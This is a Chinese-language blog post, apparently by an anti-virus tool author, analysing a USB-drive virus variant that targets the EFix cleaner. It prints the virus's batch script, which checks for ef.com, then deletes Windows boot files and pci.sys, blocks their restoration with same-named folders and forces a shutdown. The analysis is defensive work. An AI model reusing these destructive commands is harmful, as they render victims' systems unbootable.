2009年8月23日 星期日

有意思...

這一次碰到的隨身碟資料夾型病毒很有意思

感謝香菇小精靈隨身碟病毒清除軟體作者提供了一些資訊

是這樣的.

前幾天我有跟人提到就是台灣製的隨身碟病毒

這個隨身碟病毒有變種

而他這一次的變種有針對EFix而來.

這還第一次碰到....還蠻有意思的

香菇小精靈有提到該病毒會檢測系統裡面的程序

該批次代碼如下:


tasklist|findstr /c:"ef.com" && (goto :kill)

:kill
taskkill /F /IM explorer.exe
del /f /s /q /a:h %SystemDrive%\boot.ini
del /f /s /q /a:h %SystemDrive%\IO.sys
del /f /s /q /a:h %SystemDrive%\CONFIG.SYS
del /f /s /q /a:h %SystemDrive%\ntldr
del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT
del /f /s /q /a:h %SystemDrive%\MSDOS.SYS
md %SystemDrive%\boot.ini
md %SystemDrive%\IO.sys
md %SystemDrive%\CONFIG.SYS
md %SystemDrive%\ntldr
md %SystemDrive%\AUTOEXEC.BAT
md %SystemDrive%\MSDOS.SYS
del /f /s /q "%windir%\system32\drivers\pci.sys"
md "%windir%\system32\drivers\pci.sys"
shutdown -f -s -t 0
del %0

上面的代碼我大概解釋一下
該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序
有的話,就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去

然而ef.com 就是EFix使用的主運作程序....XD

所以我想之前有一位版友有碰到ntldr移失的,我看大概就是因為這樣的原因
好樣的....


我這兩天會找時間再做一些修改,看看能不能突破這惡意攻擊...
有中的人自己先小心點.